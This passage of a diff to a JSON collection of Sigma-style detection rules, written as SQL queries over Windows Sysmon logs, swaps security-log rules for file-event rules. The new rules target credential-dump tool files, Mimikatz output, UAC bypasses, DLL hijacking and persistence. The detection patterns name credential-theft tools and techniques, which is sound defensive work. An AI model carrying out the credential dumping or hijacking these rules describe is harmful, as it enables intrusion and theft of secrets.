'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%.lnk' ESCAPE '\\' AND (TargetFilename LIKE '%.doc.%' ESCAPE '\\' OR TargetFilename LIKE '%.docx.%' ESCAPE '\\' OR TargetFilename LIKE '%.xls.%' ESCAPE '\\' OR TargetFilename LIKE '%.xlsx.%' ESCAPE '\\' OR TargetFilename LIKE '%.ppt.%' ESCAPE '\\' OR TargetFilename LIKE '%.pptx.%' ESCAPE '\\' OR TargetFilename LIKE '%.jpg.%' ESCAPE '\\' OR TargetFilename LIKE '%.pdf.%' ESCAPE '\\')) AND NOT (((TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Office\\\\Recent\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Recent\\\\%' ESCAPE '\\')) OR (Image LIKE '%\\\\excel.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Excel%' ESCAPE '\\') OR (Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\PowerPoint%' ESCAPE '\\') OR (Image LIKE '%\\\\winword.exe' ESCAPE '\\' AND 
TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Word%' ESCAPE '\\')))" ], - "filename": "win_security_dce_rpc_smb_spoolss_named_pipe.yml" + "filename": "file_event_win_susp_lnk_double_extension.yml" }, { - "title": "Local User Creation", - "id": "66b6be3d-55d0-4f47-9855-d69df21740ea", - "status": "test", - "description": "Detects local user creation on windows servers, which shouldn't happen in an Active Directory environment. Apply this Sigma Use Case on your windows server logs and not on your DC logs.", - "author": "Patrick Bareiss", + "title": "Potential RipZip Attack on Startup Folder", + "id": "a6976974-ea6f-4e97-818e-ea08625c52cb", + "status": "experimental", + "description": "Detects a phishing attack which expands a ZIP file containing a malicious shortcut.\nIf the victim expands the ZIP file via the explorer process, then the explorer process expands the malicious ZIP file and drops a malicious shortcut redirected to a backdoor into the Startup folder.\nAdditionally, the file name of the malicious shortcut in Startup folder contains {0AFACED1-E828-11D1-9187-B532F1E9575D} meaning the folder shortcut operation.\n", + "author": "Greg (rule)", "tags": [ "attack.persistence", - "attack.t1136.001" + "attack.t1547" ], "falsepositives": [ - "Domain Controller Logs", - "Local accounts managed by privileged account management tools" + "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4720')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup%' ESCAPE '\\' AND TargetFilename LIKE '%.lnk.{0AFACED1-E828-11D1-9187-B532F1E9575D}%' ESCAPE '\\' AND Image LIKE '%\\\\explorer.exe' ESCAPE '\\')" ], - "filename": "win_security_user_creation.yml" + "filename": "file_event_win_ripzip_attack.yml" }, { - "title": "CVE-2021-1675 Print Spooler Exploitation IPC 
Access", - "id": "8fe1c584-ee61-444b-be21-e9054b229694", - "status": "experimental", - "description": "Detects remote printer driver load from Detailed File Share in Security logs that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675 and CVE-2021-34527", - "author": "INIT_6", + "title": "Potential Persistence Via Microsoft Office Add-In", + "id": "8e1cb247-6cf6-42fa-b440-3f27d57e9936", + "status": "test", + "description": "Detects potential persistence activity via startup add-ins that load when Microsoft Office starts (.wll/.xll are simply .dll fit for Word or Excel).", + "author": "NVISO", "tags": [ - "attack.execution", - "attack.t1569", - "cve.2021.1675", - "cve.2021.34527" + "attack.persistence", + "attack.t1137.006" ], "falsepositives": [ - "Unknown" + "Legitimate add-ins" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND RelativeTargetName = 'spoolss' AND AccessMask = '0x3' AND ObjectType = 'File')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\Microsoft\\\\Word\\\\Startup\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.wll' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\Microsoft\\\\Excel\\\\Startup\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.xll' ESCAPE '\\') OR (TargetFilename LIKE '%Microsoft\\\\Excel\\\\XLSTART\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.xlam' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\Microsoft\\\\Addins\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.xlam' ESCAPE '\\' OR TargetFilename LIKE '%.xla' ESCAPE '\\' OR TargetFilename LIKE '%.ppam' ESCAPE '\\'))))" ], - "filename": "win_security_exploit_cve_2021_1675_printspooler_security.yml" + "filename": "file_event_win_office_addin_persistence.yml" }, { - "title": "Invoke-Obfuscation VAR+ Launcher - Security", - "id": 
"dcf2db1f-f091-425b-a821-c05875b8925a", + "title": "Creation of a Diagcab", + "id": "3d0ed417-3d94-4963-a562-4a92c940656a", "status": "experimental", - "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects the creation of diagcab file, which could be caused by some legitimate installer or is a sign of exploitation (review the filename and its location)", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.resource_development" ], "falsepositives": [ - "Unknown" + "Legitimate microsoft diagcab" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%\"set%' ESCAPE '\\' AND ServiceFileName LIKE '%-f%' ESCAPE '\\' AND (ServiceFileName LIKE '%/c%' ESCAPE '\\' OR ServiceFileName LIKE '%/r%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%.diagcab' ESCAPE '\\')" ], - "filename": "win_security_invoke_obfuscation_var_services_security.yml" + "filename": "file_event_win_susp_diagcab.yml" }, { - "title": "Service Installed By Unusual Client - Security", - "id": "c4e92a97-a9ff-4392-9d2d-7a4c642768ca", - "status": "experimental", - "description": "Detects a service installed by a client which has PID 0 or whose parent has PID 0", - "author": "Tim Rauch", + "title": "UAC Bypass Using Windows Media Player - File", + "id": "68578b43-65df-4f81-9a9b-92f32711a951", + "status": "test", + "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ + "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1543" + "attack.t1548.002" ], "falsepositives": [ 
"Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ClientProcessId = '0' OR ParentProcessId = '0'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\OskSupport.dll' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\system32\\\\DllHost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files\\\\Windows Media Player\\\\osk.exe' ESCAPE '\\')))" ], - "filename": "win_security_service_installation_by_unusal_client.yml" + "filename": "file_event_win_uac_bypass_wmp.yml" }, { - "title": "Outgoing Logon with New Credentials", - "id": "def8b624-e08f-4ae1-8612-1ba21190da6b", + "title": "Office Template Creation", + "id": "0e20c89d-2264-44ae-8238-aeeaba609ece", "status": "experimental", - "description": "Detects logon events that specify new credentials", + "description": "Detects creation of template files for Microsoft Office from outside Office", "author": "Max Altgelt (Nextron Systems)", + "tags": [ + "attack.persistence", + "attack.t1137" + ], "falsepositives": [ - "Legitimate remote administration activity" + "Loading a user environment from a backup or a domain controller", + "Synchronization of templates" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '9')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((TargetFilename LIKE '%.dot' ESCAPE '\\' OR TargetFilename LIKE '%.dotm' ESCAPE '\\' OR TargetFilename LIKE '%.doc' ESCAPE '\\' OR TargetFilename LIKE '%.docm' ESCAPE '\\' OR TargetFilename LIKE '%.docx' ESCAPE '\\' OR TargetFilename LIKE '%.rtf' ESCAPE '\\') AND TargetFilename LIKE '%\\\\Microsoft\\\\Word\\\\Startup%' ESCAPE '\\') OR ((TargetFilename LIKE '%.xlt' ESCAPE '\\' OR TargetFilename 
LIKE '%.xltm' ESCAPE '\\' OR TargetFilename LIKE '%.xls' ESCAPE '\\' OR TargetFilename LIKE '%.xlsm' ESCAPE '\\' OR TargetFilename LIKE '%.xlsx' ESCAPE '\\') AND TargetFilename LIKE '%\\\\Microsoft\\\\Excel\\\\Startup%' ESCAPE '\\')) AND NOT ((Image LIKE '%\\\\WINWORD.exe' ESCAPE '\\' OR Image LIKE '%\\\\EXCEL.exe' ESCAPE '\\')))" ], - "filename": "win_security_susp_logon_newcredentials.yml" + "filename": "file_event_win_word_template_creation.yml" }, { - "title": "SAM Registry Hive Handle Request", - "id": "f8748f2c-89dc-4d95-afb0-5a2dfdbad332", + "title": "Mimikatz Kirbi File Creation", + "id": "9e099d99-44c2-42b6-a6d8-54c3545cab29", "status": "test", - "description": "Detects handles requested to SAM registry hive", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Detects the creation of files created by mimikatz such as \".kirbi\", \"mimilsa.log\", etc.", + "author": "Florian Roth (Nextron Systems), David ANDRE", "tags": [ - "attack.discovery", - "attack.t1012", "attack.credential_access", - "attack.t1552.002" + "attack.t1558" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4656' AND ObjectType = 'Key' AND ObjectName LIKE '%\\\\SAM' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%.kirbi' ESCAPE '\\' OR TargetFilename LIKE '%mimilsa.log' ESCAPE '\\'))" ], - "filename": "win_security_sam_registry_hive_handle_request.yml" + "filename": "file_event_win_hktl_mimikatz_files.yml" }, { - "title": "Possible DC Shadow Attack", - "id": "32e19d25-4aed-4860-a55a-be99cb0bf7ed", + "title": "Legitimate Application Dropped Executable", + "id": "f0540f7e-2db3-4432-b9e0-3965486744bc", "status": "experimental", - "description": "Detects DCShadow via create new SPN", - "author": "Ilyas Ochkov, oscd.community, Chakib Gzenayi (@Chak092), Hosni Mribah", + 
"description": "Detects programs on a Windows system that should not write executables to disk", + "author": "frack113, Florian Roth", "tags": [ - "attack.credential_access", - "attack.t1207" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Valid on domain controllers; exclude known DCs" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4742' AND ServicePrincipalNames LIKE '%GC/%' ESCAPE '\\') OR (EventID = '5136' AND AttributeLDAPDisplayName = 'servicePrincipalName' AND AttributeValue LIKE 'GC/%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR Image LIKE '%\\\\visio.exe' ESCAPE '\\' OR Image LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR Image LIKE '%\\\\wordview.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR Image LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR Image LIKE '%\\\\Desktopimgdownldr.exe' ESCAPE '\\' OR Image LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR Image LIKE '%\\\\finger.exe' ESCAPE '\\' OR Image LIKE '%\\\\notepad.exe' ESCAPE '\\' OR Image LIKE '%\\\\AcroRd32.exe' ESCAPE '\\' OR Image LIKE '%\\\\RdrCEF.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.ocx' ESCAPE '\\'))" ], - "filename": "win_security_possible_dc_shadow.yml" + "filename": "file_event_win_legitimate_app_dropping_exe.yml" }, { - "title": "DCOM InternetExplorer.Application Iertutil DLL Hijack - Security", - "id": 
"c39f0c81-7348-4965-ab27-2fde35a1b641", + "title": "UAC Bypass Abusing Winsat Path Parsing - File", + "id": "155dbf56-e0a4-4dd0-8905-8a98705045e8", "status": "test", - "description": "Detects a threat actor creating a file named `iertutil.dll` in the `C:\\Program Files\\Internet Explorer\\` directory over the network for a DCOM InternetExplorer DLL Hijack scenario.", - "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", + "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1021.003" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND RelativeTargetName LIKE '%\\\\Internet Explorer\\\\iertutil.dll' ESCAPE '\\') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\system32\\\\winsat.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\system32\\\\winmm.dll' ESCAPE '\\'))" ], - "filename": "win_security_dcom_iertutil_dll_hijack.yml" + "filename": "file_event_win_uac_bypass_winsat.yml" }, { - "title": "Kerberos Manipulation", - "id": "f7644214-0eb0-4ace-9455-331ec4c09253", + "title": "Cred Dump Tools Dropped Files", + "id": "8fbf3271-1ef6-4e94-8210-03c2317947f6", "status": "test", - "description": "This method triggers on rare Kerberos Failure Codes caused by manipulations of Kerberos messages", - "author": "Florian Roth (Nextron Systems)", + "description": "Files with well-known filenames (parts of credential dump software or files produced by them) creation", + "author": "Teymur 
Kheirkhabarov, oscd.community", "tags": [ "attack.credential_access", - "attack.t1212" + "attack.t1003.001", + "attack.t1003.002", + "attack.t1003.003", + "attack.t1003.004", + "attack.t1003.005" ], "falsepositives": [ - "Faulty legacy applications" + "Legitimate Administrator using tool for password recovery" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('675', '4768', '4769', '4771') AND FailureCode IN ('0x9', '0xA', '0xB', '0xF', '0x10', '0x11', '0x13', '0x14', '0x1A', '0x1F', '0x21', '0x22', '0x23', '0x24', '0x26', '0x27', '0x28', '0x29', '0x2C', '0x2D', '0x2E', '0x2F', '0x31', '0x32', '0x3E', '0x3F', '0x40', '0x41', '0x43', '0x44'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\pwdump%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\kirbi%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pwhashes%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wce\\_ccache%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wce\\_krbtkts%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\fgdump-log%' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\test.pwd' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsremora64.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsremora.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\fgexec.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wceaux.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SECURITY.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SYSTEM.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\NTDS.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DumpExt.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DumpSvc.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cachedump64.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cachedump.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pstgdump.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\servpw.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\servpw64.exe' ESCAPE '\\' OR TargetFilename 
LIKE '%\\\\pwdump.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\procdump64.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Dumpy.exe' ESCAPE '\\')))" ], - "filename": "win_security_susp_kerberos_manipulation.yml" + "filename": "file_event_win_cred_dump_tools_dropped_files.yml" }, { - "title": "Invoke-Obfuscation Via Use MSHTA - Security", - "id": "9b8d9203-4e0f-4cd9-bb06-4cc4ea6d0e9a", - "status": "experimental", - "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "Creation Exe for Service with Unquoted Path", + "id": "8c3c76ca-8f8b-4b1d-aaf3-81aebcd367c9", + "status": "test", + "description": "Adversaries may execute their own malicious payloads by hijacking vulnerable file path references.\nAdversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.t1547.009" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%mshta%' ESCAPE '\\' AND ServiceFileName LIKE '%vbscript:createobject%' ESCAPE '\\' AND ServiceFileName LIKE '%.run%' ESCAPE '\\' AND ServiceFileName LIKE '%window.close%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\program.exe' ESCAPE '\\')" ], - "filename": "win_security_invoke_obfuscation_via_use_mshta_services_security.yml" + "filename": "file_event_win_creation_unquoted_service_path.yml" }, { - "title": "PetitPotam Suspicious Kerberos TGT Request", - "id": "6a53d871-682d-40b6-83e0-b7c1a6c4e3a5", + "title": "Suspicious Process Writes Ntds.dit", + "id": 
"11b1ed55-154d-4e82-8ad7-83739298f720", "status": "experimental", - "description": "Detect suspicious Kerberos TGT requests.\nOnce an attacer obtains a computer certificate by abusing Active Directory Certificate Services in combination with PetitPotam, the next step would be to leverage the certificate for malicious purposes.\nOne way of doing this is to request a Kerberos Ticket Granting Ticket using a tool like Rubeus.\nThis request will generate a 4768 event with some unusual fields depending on the environment.\nThis analytic will require tuning, we recommend filtering Account_Name to the Domain Controller computer accounts.\n", - "author": "Mauricio Velazco, Michael Haag", + "description": "Detects suspicious processes that write (copy) a Active Directory database (ntds.dit) file", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.credential_access", - "attack.t1187" + "attack.t1003.002", + "attack.t1003.003" ], "falsepositives": [ - "False positives are possible if the environment is using certificates for authentication. We recommend filtering Account_Name to the Domain Controller computer accounts." 
+ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4768' AND TargetUserName LIKE '%$' ESCAPE '\\' AND CertThumbprint LIKE '%' ESCAPE '\\') AND NOT ((IpAddress = '::1') OR (CertThumbprint = '')))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\ntds.dit' ESCAPE '\\' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\wsl.exe' ESCAPE '\\'))" ], - "filename": "win_security_petitpotam_susp_tgt_request.yml" + "filename": "file_event_win_susp_ntds_dit.yml" }, { - "title": "Defrag Deactivation - Security", - "id": "c5a178bf-9cfb-4340-b584-e4df39b6a3e7", - "status": "test", - "description": "Detects the deactivation and disabling of the Scheduled defragmentation task as seen by Slingshot APT group", - "author": "Florian Roth (Nextron Systems), Bartlomiej Czyz (@bczyz1)", + "title": "Suspicious Get-Variable.exe Creation", + "id": "0c3fac91-5627-46e8-a6a8-a0d7b9b8ae1b", + "status": "experimental", + "description": "Get-Variable is a valid PowerShell cmdlet\nWindowsApps is by default in the path where PowerShell is executed.\nSo when the Get-Variable command is issued on PowerShell execution, the system first looks for the Get-Variable executable in the path and executes the malicious binary instead of looking for the PowerShell cmdlet.\n", + "author": "frack113", "tags": [ "attack.persistence", - "attack.t1053", - "attack.s0111" + "attack.t1546", + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4701' AND TaskName LIKE 
'\\\\Microsoft\\\\Windows\\\\Defrag\\\\ScheduledDefrag' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%Local\\\\Microsoft\\\\WindowsApps\\\\Get-Variable.exe' ESCAPE '\\')" ], - "filename": "win_security_apt_slingshot.yml" + "filename": "file_event_win_susp_get_variable.yml" }, { - "title": "Important Scheduled Task Deleted/Disabled", - "id": "7595ba94-cf3b-4471-aa03-4f6baa9e5fad", + "title": "Creation Of Non-Existent System DLL", + "id": "df6ecb8b-7822-4f4b-b412-08f524b4576c", "status": "experimental", - "description": "Detects when adversaries stop services or processes by deleting or disabling their respective scheduled tasks in order to conduct data destructive activities", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the creation of system dlls that are not present on the system. Usually to achieve dll hijacking", + "author": "Nasreddine Bencherchali (Nextron Systems), fornotes", "tags": [ - "attack.execution", - "attack.privilege_escalation", + "attack.defense_evasion", "attack.persistence", - "attack.t1053.005" + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4699', '4701') AND (TaskName LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\Schedule%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\')) AND NOT ((EventID = '4699' AND SubjectUserName LIKE '%$' ESCAPE '\\' AND TaskName LIKE '%\\\\Windows\\\\Windows 
Defender\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\WLBSCTRL.dll' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\TSMSISrv.dll' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\TSVIPSrv.dll' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\wow64log.dll' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\WptsExtensions.dll' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\') OR TargetFilename LIKE '%\\\\SprintCSP.dll' ESCAPE '\\') AND NOT (Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\'))" ], - "filename": "win_security_susp_scheduled_task_delete_or_disable.yml" + "filename": "file_event_win_create_non_existent_dlls.yml" }, { - "title": "Remote PowerShell Sessions Network Connections (WinRM)", - "id": "13acf386-b8c6-4fe0-9a6e-c4756b974698", - "status": "test", - "description": "Detects basic PowerShell Remoting (WinRM) by monitoring for network inbound connections to ports 5985 OR 5986", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "title": "DLL Search Order Hijackig Via Additional Space in Path", + "id": "b6f91281-20aa-446a-b986-38a92813a18f", + "status": "experimental", + "description": "Detects when an attacker create a similar folder structure to windows system folders such as (Windows, Program Files...)\nbut with a space in order to trick DLL load search order and perform a \"DLL Search Order Hijacking\" attack\n", + "author": "frack113, Nasreddine Bencherchali", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ - "Legitimate use of remote PowerShell execution" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5156' AND 
DestPort IN ('5985', '5986') AND LayerRTID = '44')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE 'C:\\\\Windows \\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Program Files \\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Program Files (x86) \\\\%' ESCAPE '\\') AND TargetFilename LIKE '%.dll' ESCAPE '\\')" ], - "filename": "win_security_remote_powershell_session.yml" + "filename": "file_event_win_dll_sideloading_space_path.yml" }, { - "title": "Pass the Hash Activity 2", - "id": "8eef149c-bd26-49f2-9e5a-9b00e3af499b", - "status": "stable", - "description": "Detects the attack technique pass the hash which is used to move laterally inside the network", - "author": "Dave Kennedy, Jeff Warren (method) / David Vassallo (rule)", + "title": "Potential Persistence Attempt Via ErrorHandler.Cmd", + "id": "15904280-565c-4b73-9303-3291f964e7f9", + "status": "experimental", + "description": "Detects creation of a file named \"ErrorHandler.cmd\" in the \"C:\\WINDOWS\\Setup\\Scripts\\\" directory which could be used as a method of persistence\nThe content of C:\\WINDOWS\\Setup\\Scripts\\ErrorHandler.cmd is read whenever some tools under C:\\WINDOWS\\System32\\oobe\\ (e.g. 
Setup.exe) fail to run for any reason.\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1550.002" + "attack.persistence" ], "falsepositives": [ - "Administrator activity" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4624' AND SubjectUserSid = 'S-1-0-0' AND LogonType = '3' AND LogonProcessName = 'NtLmSsp' AND KeyLength = '0') OR (EventID = '4624' AND LogonType = '9' AND LogonProcessName = 'seclogo')) AND NOT (TargetUserName = 'ANONYMOUS LOGON'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\WINDOWS\\\\Setup\\\\Scripts\\\\ErrorHandler.cmd' ESCAPE '\\')" ], - "filename": "win_security_pass_the_hash_2.yml" + "filename": "file_event_win_persistence_error_handler_cmd.yml" }, { - "title": "Azure AD Health Service Agents Registry Keys Access", - "id": "1d2ab8ac-1a01-423b-9c39-001510eae8e8", - "status": "test", - "description": "This detection uses Windows security events to detect suspicious access attempts to the registry key values and sub-keys of Azure AD Health service agents (e.g AD FS).\nInformation from AD Health service agents can be used to potentially abuse some of the features provided by those services in the cloud (e.g. 
